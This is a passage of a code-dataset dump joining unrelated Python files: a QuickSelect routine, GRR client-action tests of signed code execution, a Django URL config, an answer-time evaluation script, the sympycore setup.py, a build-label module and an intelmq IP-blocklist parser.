    """Lomuto partition of array[begin:end] around a median-of-three pivot.

    After the call, elements smaller than the pivot precede it and the
    rest follow it.  The pivot's final index is returned.
    """
    pivot = selectPivotMedian(array, begin, end)
    store = begin + 1  # first position holding an element >= pivot
    for current in range(begin + 1, end):
        if array[current] < pivot:
            array[store], array[current] = array[current], array[store]
            store += 1
    # Move the pivot (still sitting at begin) between the two regions.
    array[begin], array[store - 1] = array[store - 1], array[begin]
    return store - 1
# Function that do a partition of the subarray [begin,end[.
# It uses the Hoare algorithm. The expected total number
# of swaps is n/6 - 1/3. It's better than the previous
# partition scheme and, furthermore, it does good partitions
# with repeted elements.
# A further comparison in:
# http://cs.stackexchange.com/questions/11458/quicksort-partitioning-hoare-vs-lomuto
def partitionHoare(array, begin, end):
    """Hoare partition of array[begin:end] around a median-of-three pivot.

    Performs fewer swaps on average than the Lomuto scheme and splits
    runs of equal elements more evenly.  Returns the pivot's final index.
    """
    pivot = selectPivotMedian(array, begin, end)
    lo = begin
    hi = end - 1
    while True:
        while lo < hi and array[hi] >= pivot:
            hi -= 1
        while lo < hi and array[lo] <= pivot:
            lo += 1
        if lo >= hi:
            break
        array[lo], array[hi] = array[hi], array[lo]
    # Place the pivot (at begin) at its final position.
    array[begin], array[hi] = array[hi], array[begin]
    return hi
# Function that selects the order-th element of array [begin, end[ according to
# the sorting relation of the elements. It is call the ith-order statistic element.
# The algorithms runs with O(n) as average time.
# It is the classical QuickSelect implementation.
# A partition it is performed and the search is done in the corresponding subarray.
def quickSelect(array, begin, end, order):
    """Return the order-th order statistic of array[begin:end].

    Average running time is linear; the array is partially reordered as
    a side effect.  An empty range yields None.
    """
    # The original tail recursion is expressed as a loop.
    while end - begin > 1:
        pivot_index = partitionHoare(array, begin, end)
        if pivot_index == order:
            return array[pivot_index]
        if pivot_index > order:
            end = pivot_index
        else:
            begin = pivot_index + 1
    if end - begin == 1:
        return array[begin]
######################## MAIN ##########################
# See if arguments are correct
# Usage: QuickSelect.py <array-file> <order>, where the file holds one
# integer per line and order is the 0-based rank requested.
if len(sys.argv) != 3:
    print("Error: Needs the array.txt and the order of the element asked as arguments.")
    sys.exit()
# Read array
# NOTE(review): the file stays open if a later error exits early; a
# 'with' block would be safer.
numbers = open(sys.argv[1])
array = [ ]
for line in numbers:
    array.append(int(line))
# Get order and check it is correct
order = int(sys.argv[2])
if order < 0 or order >= len(array):
    print("Error: Order must be between 0 and the length of the array - 1.")
    sys.exit()
# Execute quickSelect and count the time wasted
# Only the selection itself is timed, not the file I/O above.
start_time = time.time()
a = quickSelect(array, 0, len(array), order)
print("--- %f seconds ---" % (time.time() - start_time) )
print(order, "- ith order statistic: ", a)
numbers.close()
| andreshp/Algorithms | SelectionAlgorithms/Python/QuickSelect/Classical/QuickSelect.py | Python | gpl-2.0 | 4,821 |
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
"""Test client standard actions."""
import gzip
import hashlib
import os
import time
from grr.client.client_actions import standard
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
class TestExecutePython(test_lib.EmptyActionTest):
  """Test the client execute actions."""
  def setUp(self):
    super(TestExecutePython, self).setUp()
    # Private key used to sign the code/binary blobs sent to the client.
    self.signing_key = config_lib.CONFIG[
        "PrivateKeys.executable_signing_private_key"]
  def testExecutePython(self):
    """Test the basic ExecutePython action."""
    utils.TEST_VAL = "original"
    python_code = "utils.TEST_VAL = 'modified'"
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, self.signing_key)
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    result = self.RunAction("ExecutePython", request)[0]
    # The action must report resource usage and actually run the code.
    self.assertTrue(result.time_used > 0)
    self.assertEqual(result.return_val, "")
    self.assertEqual(utils.TEST_VAL, "modified")
  def testExecuteModifiedPython(self):
    """Test that rejects invalid ExecutePython action."""
    utils.TEST_VAL = "original"
    python_code = "utils.TEST_VAL = 'modified'"
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, self.signing_key)
    # Modify the data so the signature does not match.
    signed_blob.data = "utils.TEST_VAL = 'notmodified'"
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    # Should raise since the code has been modified.
    self.assertRaises(rdfvalue.DecodeError,
                      self.RunAction, "ExecutePython", request)
    # Lets also adjust the hash.
    # Even with a matching digest the signature check must still fail.
    signed_blob.digest = hashlib.sha256(signed_blob.data).digest()
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    self.assertRaises(rdfvalue.DecodeError,
                      self.RunAction, "ExecutePython", request)
    # Make sure the code never ran.
    self.assertEqual(utils.TEST_VAL, "original")
  def testExecuteBrokenPython(self):
    """Test broken code raises back to the original flow."""
    python_code = "raise ValueError"
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, self.signing_key)
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    self.assertRaises(ValueError,
                      self.RunAction, "ExecutePython", request)
  def testExecuteBinary(self):
    """Test the basic ExecuteBinaryCommand action."""
    signed_blob = rdfvalue.SignedBlob()
    # NOTE(review): assumes a POSIX /bin/ls -- this test cannot run on
    # Windows as written.
    signed_blob.Sign(open("/bin/ls").read(), self.signing_key)
    writefile = utils.Join(self.temp_dir, "binexecute", "ablob")
    os.makedirs(os.path.dirname(writefile))
    request = rdfvalue.ExecuteBinaryRequest(executable=signed_blob,
                                            args=[__file__],
                                            write_path=writefile)
    result = self.RunAction("ExecuteBinaryCommand", request)[0]
    self.assertTrue(result.time_used > 0)
    self.assertTrue(__file__ in result.stdout)
  def testReturnVals(self):
    """Test return values."""
    python_code = "magic_return_str = 'return string'"
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, self.signing_key)
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    result = self.RunAction("ExecutePython", request)[0]
    self.assertEqual(result.return_val, "return string")
  def testWrongKey(self):
    """Test return values."""
    python_code = "print 'test'"
    # Generate a test valid RSA key that isn't the real one.
    signing_key = rdfvalue.PEMPrivateKey.GenKey(2048, 65537)
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, signing_key)
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
    self.assertRaises(rdfvalue.DecodeError, self.RunAction,
                      "ExecutePython", request)
  def testArgs(self):
    """Test passing arguments."""
    utils.TEST_VAL = "original"
    python_code = """
magic_return_str = py_args['test']
utils.TEST_VAL = py_args[43]
"""
    signed_blob = rdfvalue.SignedBlob()
    signed_blob.Sign(python_code, self.signing_key)
    pdict = rdfvalue.Dict({"test": "dict_arg",
                           43: "dict_arg2"})
    request = rdfvalue.ExecutePythonRequest(python_code=signed_blob,
                                            py_args=pdict)
    result = self.RunAction("ExecutePython", request)[0]
    self.assertEqual(result.return_val, "dict_arg")
    self.assertEqual(utils.TEST_VAL, "dict_arg2")
class TestCopyPathToFile(test_lib.EmptyActionTest):
  """Test CopyPathToFile client actions.

  Fix: every ``open(...).read()`` left a file handle dangling; all file
  access now uses ``with`` blocks so handles are closed deterministically.
  """

  def setUp(self):
    super(TestCopyPathToFile, self).setUp()
    self.path_in = os.path.join(self.base_path, "morenumbers.txt")
    # Hash of the source file; the tests compare their copies against it.
    with open(self.path_in) as f:
      self.hash_in = hashlib.sha1(f.read()).hexdigest()
    self.pathspec = rdfvalue.PathSpec(
        path=self.path_in, pathtype=rdfvalue.PathSpec.PathType.OS)

  def testCopyPathToFile(self):
    """A full copy must be byte-identical to the source file."""
    request = rdfvalue.CopyPathToFileRequest(offset=0,
                                             length=0,
                                             src_path=self.pathspec,
                                             dest_dir=self.temp_dir,
                                             gzip_output=False)
    result = self.RunAction("CopyPathToFile", request)[0]
    with open(result.dest_path.path) as f:
      hash_out = hashlib.sha1(f.read()).hexdigest()
    self.assertEqual(self.hash_in, hash_out)

  def testCopyPathToFileLimitLength(self):
    """length limits the number of bytes copied."""
    request = rdfvalue.CopyPathToFileRequest(offset=0,
                                             length=23,
                                             src_path=self.pathspec,
                                             dest_dir=self.temp_dir,
                                             gzip_output=False)
    result = self.RunAction("CopyPathToFile", request)[0]
    with open(result.dest_path.path) as f:
      output = f.read()
    self.assertEqual(len(output), 23)

  def testCopyPathToFileOffsetandLimit(self):
    """offset and length together select the expected byte range."""
    with open(self.path_in) as f:
      f.seek(38)
      out = f.read(25)
      hash_in = hashlib.sha1(out).hexdigest()
    request = rdfvalue.CopyPathToFileRequest(offset=38,
                                             length=25,
                                             src_path=self.pathspec,
                                             dest_dir=self.temp_dir,
                                             gzip_output=False)
    result = self.RunAction("CopyPathToFile", request)[0]
    with open(result.dest_path.path) as f:
      output = f.read()
    self.assertEqual(len(output), 25)
    hash_out = hashlib.sha1(output).hexdigest()
    self.assertEqual(hash_in, hash_out)

  def testCopyPathToFileGzip(self):
    """gzip_output compresses the copy; decompressing restores the bytes."""
    request = rdfvalue.CopyPathToFileRequest(offset=0,
                                             length=0,
                                             src_path=self.pathspec,
                                             dest_dir=self.temp_dir,
                                             gzip_output=True)
    result = self.RunAction("CopyPathToFile", request)[0]
    with gzip.open(result.dest_path.path) as f:
      self.assertEqual(hashlib.sha1(f.read()).hexdigest(), self.hash_in)

  def testCopyPathToFileLifetimeLimit(self):
    """A copy created with a lifetime must be deleted after it expires."""
    request = rdfvalue.CopyPathToFileRequest(offset=0,
                                             length=23,
                                             src_path=self.pathspec,
                                             dest_dir=self.temp_dir,
                                             gzip_output=False,
                                             lifetime=0.1)
    result = self.RunAction("CopyPathToFile", request)[0]
    self.assertTrue(os.path.exists(result.dest_path.path))
    time.sleep(1)
    self.assertFalse(os.path.exists(result.dest_path.path))
class TestNetworkByteLimits(test_lib.EmptyActionTest):
  """Test that the TransferBuffer action honours network byte limits."""

  def setUp(self):
    super(TestNetworkByteLimits, self).setUp()
    pathspec = rdfvalue.PathSpec(path="/nothing",
                                 pathtype=rdfvalue.PathSpec.PathType.OS)
    self.buffer_ref = rdfvalue.BufferReference(pathspec=pathspec, length=5000)
    # Stub out VFS reads so TransferBuffer always "reads" these 500 bytes.
    self.data = "X" * 500
    self.old_read = standard.vfs.ReadVFS
    standard.vfs.ReadVFS = lambda x, y, z: self.data
    self.transfer_buf = test_lib.ActionMock("TransferBuffer")

  def testTransferNetworkByteLimitError(self):
    """Sending more than network_bytes_limit must abort the action."""
    message = rdfvalue.GrrMessage(name="TransferBuffer",
                                  payload=self.buffer_ref,
                                  network_bytes_limit=300)
    # We just get a client alert and a status message back.
    responses = self.transfer_buf.HandleMessage(message)
    client_alert = responses[0].payload
    self.assertTrue("Network limit exceeded" in str(client_alert))
    status = responses[1].payload
    self.assertTrue("Action exceeded network send limit"
                    in str(status.backtrace))
    self.assertEqual(status.status,
                     rdfvalue.GrrStatus.ReturnedStatus.NETWORK_LIMIT_EXCEEDED)

  def testTransferNetworkByteLimit(self):
    """A transfer below the limit completes with an OK status."""
    message = rdfvalue.GrrMessage(name="TransferBuffer",
                                  payload=self.buffer_ref,
                                  network_bytes_limit=900)
    responses = self.transfer_buf.HandleMessage(message)
    for response in responses:
      if isinstance(response, rdfvalue.GrrStatus):
        self.assertEqual(response.payload.status,
                         rdfvalue.GrrStatus.ReturnedStatus.OK)

  def tearDown(self):
    super(TestNetworkByteLimits, self).tearDown()
    # Restore the real VFS read hook stubbed out in setUp().
    standard.vfs.ReadVFS = self.old_read
def main(argv):
  # Delegate to the GRR test runner, which executes the tests in this module.
  test_lib.main(argv)

if __name__ == "__main__":
  # StartMain parses command line flags before invoking main().
  flags.StartMain(main)
| spnow/grr | client/client_actions/standard_test.py | Python | apache-2.0 | 9,903 |
from django.conf.urls import patterns, include, url
from django.contrib import admin

# Populate the admin site with ModelAdmin registrations from installed apps.
admin.autodiscover()

# Root URL configuration: the ebets app handles all URLs except /admin/.
urlpatterns = patterns('',
    url(r'^', include('ebets.urls')),
    url(r'^admin/', include(admin.site.urls)),
)
| pisskidney/dota | dota/urls.py | Python | mit | 222 |
#!/usr/bin/python3
# -*- coding: UTF-8 -*-

import json
import sys

# Include custom libs
sys.path.append( '../../../include/python' )
import serverutils.config as config

from statistics import mean, median, stdev
import numpy as np

# Default property values (overridable via key=value command line arguments).
props = {'evalFile1': '../results-postprocessing/data/evaluation1.json',
         'evalFile2': '../results-postprocessing/data/evaluation2.json',
         'histogramFile': None,
         'histogramInterval': 5000}
# Human readable description of each property, used by printUsageInfo().
propDesc = {'evalFile1': 'Post-processed result file from first evaluation',
            'evalFile2': 'Post-processed result file from second evaluation',
            'histogramFile': 'Prefix for filename of histogram output files',
            'histogramInterval': 'Interval size for histogram categories'}
# Dimensions whose presence marks a quiz session as "type 1" (main dimensions).
type1dimensions = ['Openness','Neuroticism','Extraversion','Conscientiousness','Agreeableness']
# Usage info
def printUsageInfo():
    """Print usage instructions including every supported property."""
    print("Evaluation of correctness depending on time taken to answer a question")
    print()
    options = " ".join('[' + key + '=...]' for key in sorted(propDesc.keys()))
    print("Usage: evaluationTime.py", options)
    for key in sorted(propDesc.keys()):
        print()
        print(" "+key+" (default: "+str(props[key])+")")
        print(" "+propDesc[key])
    print()
# Check whether usage info should be printed out
if '--help' in sys.argv:
    printUsageInfo()
    exit()

# Overridden properties from command line
for arg in sys.argv[1:]:
    # Split on the FIRST '=' only, so values may themselves contain '='.
    # (The previous split('=', 2) produced three fields for "key=a=b" and
    # crashed the two-name unpacking below with a ValueError.)
    k, v = arg.split('=', 1)
    props[k] = v
# Helper function to extract (time, correct)-Tuples from the input data
# data is the input data
# quizType is either None (first evaluation) or 0/1 for the second evaluation
def extractTimes(data, quizType = None):
    """Collect (timeTaken, answeredCorrectly) tuples from matching sessions."""
    extracted = []
    for session in data:
        keep = True
        if quizType is not None:
            # Sadly, the quizType hasn't been stored correctly, so we try to
            # determine it by the dimension of the first question:
            session['quizType'] = 1 if session['questions'][0]['dimension'] in type1dimensions else 0
            keep = session['quizType'] == quizType
        if not keep:
            # Skip sessions of the wrong quiz type
            continue
        for question in session['questions']:
            # An answer is correct iff it is not one of the distractors.
            distractorIds = [c['_id'] for c in question['distractorCharacters']]
            correct = question['answer'] not in distractorIds
            extracted.append((question['timeTaken'], correct))
    return extracted
# Write a histogram file
def writeHistogram(filename, data, interval):
    """Write a CSV histogram (bucket-start;count) of data, outliers removed."""
    cleaned = removeOutliers(data)
    counts = {}
    highest = 0
    for value in cleaned:
        # Bucket index is shifted by one, so bucket 0 is always empty.
        bucket = int(value / interval) + 1
        counts[bucket] = counts.get(bucket, 0) + 1
        highest = max(bucket, highest)
    with open(filename, 'w') as out:
        for n in range(highest + 1):
            out.write(str(n * interval) + ";" + str(counts.get(n, 0)) + "\n")
# Method to remove outliers (users taking a nap in front of the screen etc.)
def removeOutliers(values):
    """Return values with Tukey-fence outliers removed.

    A value is kept iff Q1 - k*IQR <= value <= Q3 + k*IQR with k = 1.5.
    The bounds are inclusive: with the original strict comparison any
    constant-valued input (IQR == 0) lost *all* of its entries.
    """
    q1 = np.percentile(values, 25)
    q3 = np.percentile(values, 75)
    k = 1.5
    kq = k * (q3 - q1)
    return list(filter(lambda v: q1 - kq <= v <= q3 + kq, values))
# Returns distribution information
def getDistributionInfo(valuesWithOutliers):
    """Compute summary statistics of the values after outlier removal."""
    cleaned = removeOutliers(valuesWithOutliers)
    info = {}
    info['mean'] = mean(cleaned)
    info['median'] = median(cleaned)
    info['totalCount'] = len(valuesWithOutliers)
    info['outlierCount'] = len(valuesWithOutliers) - len(cleaned)
    info['cleanedCount'] = len(cleaned)
    info['stdev'] = stdev(cleaned)
    return info
# Helper function to read a json file
def readData(filename):
    """Load and return the JSON document stored in filename."""
    print("Reading:", filename)
    with open(filename, 'r') as inFile:
        return json.loads(inFile.read())
# Header for the console report.
print("Analysis of Time Taken to Answer a Question and Corresponding Correctness")
print("─────────────────────────────────────────────────────────────────────────")
print()

# Read input data:
eval1Data = readData(props['evalFile1'])
eval2Data = readData(props['evalFile2'])
print()

# Extract different data series from the input
# (evaluation 2 is split by quiz type: 1 = main dimensions, 0 = sub dimensions)
evalResults = {'eval1': extractTimes(eval1Data),
               'eval2-main': extractTimes(eval2Data, 1),
               'eval2-sub': extractTimes(eval2Data, 0)}
# Console titles for each data series, keyed like evalResults.
evalTitles = {'eval1': 'Evaluation 1: Complete Character',
              'eval2-main': 'Evaluation 2: Main Dimensions',
              'eval2-sub': 'Evaluation 2: Sub Dimensions'}
def printDistributionInfo(header, dInfo):
    """Print a short console summary (mean and stdev) for one distribution."""
    print(header)
    for label, key in ((" Mean: ", 'mean'), (" Standard Deviation: ", 'stdev')):
        print(label, dInfo[key])
    print()
# Do analysis and write output
for evalRun in sorted(evalResults.keys()):
    results = evalResults[evalRun]
    # Get two list with times for correct (a[1]==true) and wrong (a[1]==false) answers
    # The lists are plain integer lists, as their usage is more comfortable with statistics functions
    dataCorrect = list(map(lambda b: int(b[0]), filter(lambda a: a[1], results)))
    dataWrong = list(map(lambda b: int(b[0]), filter(lambda a: not a[1], results)))
    # Remove outliers and get distribution information for each distribution
    distInfoCorrect = getDistributionInfo(dataCorrect)
    distInfoWrong = getDistributionInfo(dataWrong)
    # Print information about both distributions
    print(evalTitles[evalRun])
    print((len(evalTitles[evalRun]))*"─")
    print("Total Answers: "+str(len(results)))
    print(" Correct Answers: "+str(distInfoCorrect['cleanedCount'])+" (excl. "+str(distInfoCorrect['outlierCount'])+" outliers)")
    print(" Wrong Answers: "+str(distInfoWrong['cleanedCount'])+" (excl. "+str(distInfoWrong['outlierCount'])+" outliers)")
    print()
    # Optionally dump per-category histogram CSV files for both answer groups.
    if props['histogramFile'] is not None:
        writeHistogram(props['histogramFile']+"-"+evalRun+"-correct.csv",dataCorrect,int(props['histogramInterval']))
        writeHistogram(props['histogramFile']+"-"+evalRun+"-wrong.csv",dataWrong,int(props['histogramInterval']))
    printDistributionInfo("Distribution of Correct Answers",distInfoCorrect)
    printDistributionInfo("Distribution of Wrong Answers",distInfoWrong)
    print()
| Thylossus/tud-movie-character-insights | Server/Tools/evaluation/evaluation-time-correctness/evaluationTime.py | Python | apache-2.0 | 6,081 |
# -*- coding: utf-8 -*-
class Mining(object):
    """Mixin that requires subclasses to provide a 'model' attribute."""

    def get_queryset(self):
        """Fail loudly when no 'model' has been provided on the instance."""
        model = getattr(self, "model", None)
        if model:
            return
        raise NotImplementedError("You must provide a 'model' method for "
                                  "the '%r' Open Mining." % self)
| mining/django-report | report/backends/mining.py | Python | mit | 268 |
#!/usr/bin/env python

# Trove classifiers advertised on PyPI (empty lines filtered out in setup()).
CLASSIFIERS = """\
Development Status :: 3 - Alpha
Intended Audience :: Science/Research
License :: OSI Approved
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""

import os
# Remove a stale MANIFEST so distutils regenerates it from scratch.
if os.path.exists('MANIFEST'): os.remove('MANIFEST')

from distutils.core import Extension, Command
from distutils.command.build_py import build_py as _build_py

# C extension implementing the core Expr type.
expr_ext = Extension('sympycore.expr_ext',
                     sources = [os.path.join('src','expr_ext.c')],
                     )

# Optional C extension for combinatorics helpers (disabled in `extensions`).
combinatorics_ext = Extension('sympycore.arithmetic.combinatorics',
                     sources = [os.path.join('sympycore','arithmetic','combinatorics.c')],
                     )

extensions = [expr_ext,
              #combinatorics_ext
              ]

# All pure-Python packages shipped with the distribution.
packages = ['sympycore',
            'sympycore.algebras',
            'sympycore.arithmetic',
            'sympycore.arithmetic.mpmath',
            'sympycore.arithmetic.mpmath.calculus',
            'sympycore.arithmetic.mpmath.functions',
            'sympycore.arithmetic.mpmath.libmp',
            'sympycore.arithmetic.mpmath.matrices',
            'sympycore.basealgebra',
            'sympycore.calculus',
            'sympycore.calculus.functions',
            'sympycore.functions',
            'sympycore.heads',
            'sympycore.logic',
            'sympycore.matrices',
            'sympycore.polynomials',
            'sympycore.physics',
            'sympycore.physics.sysbio',
            'sympycore.ring',
            'sympycore.sets',
            ]

# Add the matching <package>.tests packages where a tests/ directory exists.
packages += [p+'.tests' for p in packages \
             if os.path.exists(os.path.join(p.replace('.', os.sep), 'tests'))]
class tester(Command):
    """Custom distutils command running the sympycore test suite via nose."""

    description = "run sympycore tests"

    # (long option, short option, help text) triples understood by distutils.
    user_options = [('nose-args=', 'n', 'arguments to nose command'),
                    ('with-coverage', 'c', 'use nose --with-coverage flag'),
                    ('cover-package=', None, 'use nose --cover-package flag'),
                    ('detailed-errors', 'd', 'use nose --detailed-errors flag'),
                    ('nocapture', 's', 'use nose --nocapture flag'),
                    ('nose-verbose', 'v', 'use nose --verbose flag'),
                    ('match=', 'm', 'use nose --match flag'),
                    ('profile', 'p', 'use nose --profile flag'),
                    ('with-doctest', None, 'use nose --with-doctest flag'),
                    ('stop', 'x', 'use nose --stop flag')
                    ]

    def initialize_options(self):
        # distutils hook: declare every supported option, unset by default.
        self.nose_args = None
        self.with_coverage = None
        self.cover_package = None
        self.detailed_errors = None
        self.nocapture = None
        self.nose_verbose = None
        self.match = None
        self.profile = None
        self.with_doctest = None
        self.stop = None
        return

    def finalize_options (self):
        # distutils hook: translate the option flags into a single nose
        # argument string accumulated in self.nose_args.
        if self.nose_args is None:
            self.nose_args = ''
        if self.with_coverage:
            self.nose_args += ' --with-coverage'
        if self.cover_package:
            # --cover-package implies --with-coverage.
            if not self.with_coverage:
                self.nose_args += ' --with-coverage'
            self.nose_args += ' --cover-package=%s' % self.cover_package
        elif self.with_coverage:
            # Default coverage target when none was given explicitly.
            self.nose_args += ' --cover-package=sympycore'
        if self.detailed_errors:
            self.nose_args += ' --detailed-errors'
        if self.nocapture:
            self.nose_args += ' --nocapture'
        if self.nose_verbose:
            self.nose_args += ' --verbose'
        if self.match:
            self.nose_args += ' --match=%r' % (self.match)
        if self.profile:
            self.nose_args += ' --with-profile'
        if self.with_doctest:
            self.nose_args += ' --with-doctest'
        if self.stop:
            self.nose_args += ' --stop'
        return

    def run(self):
        # Import lazily so the command works from the source checkout.
        import sympycore
        sympycore.test(nose_args=self.nose_args)
class build_py(_build_py):
    """build_py that embeds the SVN revision into sympycore/__svn_version__.py."""

    def find_data_files (self, package, src_dir):
        # Extend the default data file list with generated/version files.
        files = _build_py.find_data_files(self, package, src_dir)
        if package=='sympycore':
            revision = self._get_svn_revision(src_dir)
            if revision is not None:
                # Write the revision module and schedule its removal at exit
                # so the working tree is left clean after the build.
                target = os.path.join(src_dir, '__svn_version__.py')
                print 'Creating ', target
                f = open(target,'w')
                f.write('version = %r\n' % (str(revision)))
                f.close()
                import atexit
                def rm_file(f=target):
                    try: os.remove(f); print 'Removed ',f
                    except OSError: pass
                    try: os.remove(f+'c'); print 'Removed ',f+'c'
                    except OSError: pass
                atexit.register(rm_file)
                files.append(target)
        if package=='sympycore.arithmetic.mpmath':
            # Ship the bundled mpmath REVISION marker if present.
            f = os.path.join(src_dir, 'REVISION')
            if os.path.isfile(f):
                files.append(f)
        return files

    def _get_svn_revision(self, path):
        """Return path's SVN revision number.
        """
        import os, sys, re
        revision = None
        m = None
        try:
            # Ask the svnversion tool for the working copy revision.
            sin, sout = os.popen4('svnversion')
            m = re.match(r'(?P<revision>\d+)', sout.read())
        except:
            pass
        if m:
            revision = int(m.group('revision'))
        # NOTE(review): this unconditional return makes everything below (the
        # .svn/entries fallback parsing) unreachable dead code -- presumably a
        # leftover short-circuit; confirm whether the fallback should run when
        # the 'svnversion' tool is unavailable.
        return revision
        if sys.platform=='win32' and os.environ.get('SVN_ASP_DOT_NET_HACK',None):
            entries = os.path.join(path,'_svn','entries')
        else:
            entries = os.path.join(path,'.svn','entries')
        if os.path.isfile(entries):
            f = open(entries)
            fstr = f.read()
            f.close()
            if fstr[:5] == '<?xml': # pre 1.4
                m = re.search(r'revision="(?P<revision>\d+)"',fstr)
                if m:
                    revision = int(m.group('revision'))
            else: # non-xml entries file --- check to be sure that
                m = re.search(r'dir[\n\r]+(?P<revision>\d+)', fstr)
                if m:
                    revision = int(m.group('revision'))
        return revision
if __name__ == '__main__':
    from distutils.core import setup
    # Wire in the custom `test` and revision-embedding `build_py` commands.
    setup(name='sympycore',
          version='0.2-svn',
          author = 'Pearu Peterson, Fredrik Johansson',
          author_email = 'sympycore@googlegroups.com',
          license = 'http://sympycore.googlecode.com/svn/trunk/LICENSE',
          url = 'http://sympycore.googlecode.com',
          download_url = 'http://code.google.com/p/sympycore/downloads/',
          classifiers=filter(None, CLASSIFIERS.split('\n')),
          description = 'SympyCore: an efficient pure Python Computer Algebra System',
          long_description = '''\
SympyCore project provides a pure Python package sympycore for
representing symbolic expressions using efficient data structures as
well as methods to manipulate them. Sympycore uses a clear algebra
oriented design that can be easily extended.
''',
          platforms = ["All"],
          packages = packages,
          ext_modules = extensions,
          package_dir = {'sympycore': 'sympycore'},
          cmdclass=dict(test=tester, build_py=build_py)
          )
| pearu/sympycore | setup.py | Python | bsd-3-clause | 7,372 |
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
    """A build label: a package (directory) name plus a target name."""

    # Characters allowed in package and target names.
    VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')

    @classmethod
    def make_label(cls, label_str):
        """Parse a label from a string or a SCons File node.

        Accepted string forms: '#pkg:target', '#pkg', ':target', 'target'.
        When no target is given, the package directory's basename is used.
        """
        package_str = None
        target_str = None
        if not isinstance(label_str, str):
            # Assume it is a SCons File node.
            label_str = label_str.srcnode().path
            package_str, target_str = os.path.split(label_str)
        elif label_str.startswith('#'):
            label_str = label_str[1:]
            if ':' in label_str:
                package_str, target_str = label_str.split(':', 1)
            else:
                package_str = label_str
        elif label_str.startswith(':'):
            target_str = label_str[1:]
        else:
            target_str = label_str
        package_name = PackageName.make_package_name(package_str)
        if not target_str:
            # Default target: basename of the package directory.
            target_str = os.path.basename(package_name.path)
        target_name = TargetName(target_str)
        return cls(package_name, target_name)

    @classmethod
    def make_label_list(cls, label_strs):
        """Parse a whitespace separated string, or an iterable, of labels."""
        if isinstance(label_strs, str):
            label_strs = label_strs.split()
        return [cls.make_label(label_str) for label_str in label_strs]

    @staticmethod
    def check_name(name):
        """Raise ValueError unless name is a well-formed label component."""
        if not name:
            raise ValueError('empty name')
        if name.startswith('/') or name.endswith('/'):
            raise ValueError('leading or trailing path separator: %s' % name)
        if '//' in name:
            raise ValueError('consecutive path separators: %s' % name)
        if not Label.VALID_NAME.match(name):
            raise ValueError('invalid name character: %s' % name)

    def __init__(self, package_name, target_name):
        assert isinstance(package_name, PackageName)
        assert isinstance(target_name, TargetName)
        self.package_name = package_name
        self.target_name = target_name

    def __str__(self):
        return '#%s:%s' % (self.package_name, self.target_name)

    def __repr__(self):
        return '%s("%s")' % (self.__class__.__name__, str(self))

    def __eq__(self, other):
        return (self.__class__ is other.__class__ and
                self.package_name == other.package_name and
                self.target_name == other.target_name)

    def __ne__(self, other):
        return not (self == other)

    def __hash__(self):
        return hash(repr(self))

    @property
    def path(self):
        # Filesystem path formed by joining package and target paths.
        return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
    """Label that refers to a build rule."""
    pass

class LabelOfFile(Label):
    """Label that refers to a file."""
    pass
class PackageName(object):
    """Validated name of a package (its directory path in the source tree)."""

    @classmethod
    def make_package_name(cls, package_str=None):
        """Create a PackageName, defaulting to the current SCons directory."""
        assert package_str is None or isinstance(package_str, str)
        return cls(package_str if package_str else Dir('.').srcnode().path)

    def __init__(self, package_name):
        assert isinstance(package_name, str)
        # Reject empty or malformed names up front.
        Label.check_name(package_name)
        self.package_name = package_name

    def __str__(self):
        return self.package_name

    def __repr__(self):
        return 'PackageName("%s")' % str(self)

    def __eq__(self, other):
        if self.__class__ is not other.__class__:
            return False
        return self.package_name == other.package_name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return hash(self.package_name)

    @property
    def path(self):
        """Filesystem path of the package directory."""
        return self.package_name
class TargetName(object):
    """Validated name of a single build target."""

    def __init__(self, target_name):
        assert isinstance(target_name, str)
        # Reject empty or malformed names up front.
        Label.check_name(target_name)
        self.target_name = target_name

    def __str__(self):
        return self.target_name

    def __repr__(self):
        return 'TargetName("%s")' % str(self)

    def __eq__(self, other):
        if self.__class__ is not other.__class__:
            return False
        return self.target_name == other.target_name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return hash(self.target_name)

    @property
    def path(self):
        """Relative filesystem path contributed by this target."""
        return self.target_name
| clchiou/scons_package | label.py | Python | mit | 4,231 |
# -*- coding: utf-8 -*-
"""
Generic parser for mapping a line to selected field discarding comments (#).
Handy for parsing various blocklist sets.
"""
import sys
import dateutil
from ipaddress import ip_network
from intelmq.lib import utils
from intelmq.lib.bot import Bot
from intelmq.lib.message import Event
class GenericIPlistParserBot(Bot):
    """Parse line-based IP/network blocklists into intelmq events.

    Runtime parameters (set in the bot configuration):
      direction: event field prefix the address is stored under
      clstype:   value written to 'classification.type'
    """

    def init(self):
        #self.parameters.direction
        #self.parameters.clstype
        pass

    def process(self):
        report = self.receive_message()
        raw_report = utils.base64_decode(report.get("raw"))
        for row in raw_report.splitlines():
            row = row.strip()
            # Skip comment and blank lines.
            if row.startswith("#") or len(row) == 0:
                continue
            event = Event(report)
            ipn = ip_network(row)
            # Single addresses go to <direction>.ip, ranges to <direction>.network.
            subkey = ".ip" if ipn.num_addresses == 1 else ".network"
            event.add(self.parameters.direction + subkey, row)
            event.add('classification.type', self.parameters.clstype)
            self.send_message(event)
        self.acknowledge_message()

if __name__ == "__main__":
    # The bot id is passed as the first command line argument.
